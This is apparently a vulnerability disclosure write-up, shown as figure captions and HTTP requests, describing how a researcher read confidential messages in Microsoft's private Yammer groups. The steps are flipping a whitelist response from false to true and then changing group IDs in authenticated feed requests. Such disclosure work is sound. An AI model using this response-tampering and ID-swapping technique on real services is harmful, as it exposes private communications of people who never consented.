Reading Message from Microsoft’s Private Yammer Group

Fig 0x00 — User is not Authorized
GET /api/user/maotg@*.onmicrosoft.com/userwhitelist 
Host: ?*.azurewebsites.net
  • The user is authorized (white-listed) if the response to the above request is true.
  • The user is not authorized if the response to the above request is false.
Fig 0x01 — checking user’s authorization
Fig 0x02 — Original Response — false
Fig 0x03 — Edited response — changing to true
GET /api/Yammer/group/15003/feeds/5 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x05 — Fetching top 5 feeds from group 15003
Figure 0x06 — More info top 1000 feed
GET /api/Yammer/group/30300774400/feeds/5000 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x07 — Reading feeds from a different group
Fig 0x08 — Sample confidential conversation between Microsoft employees
Figure 0x09 —Another example
GET /api/Yammer/group/16002774/feeds/5000 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x10 — Reading message from group 16002774
Fig 0x11 — Confidential information regarding Business Strategy

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store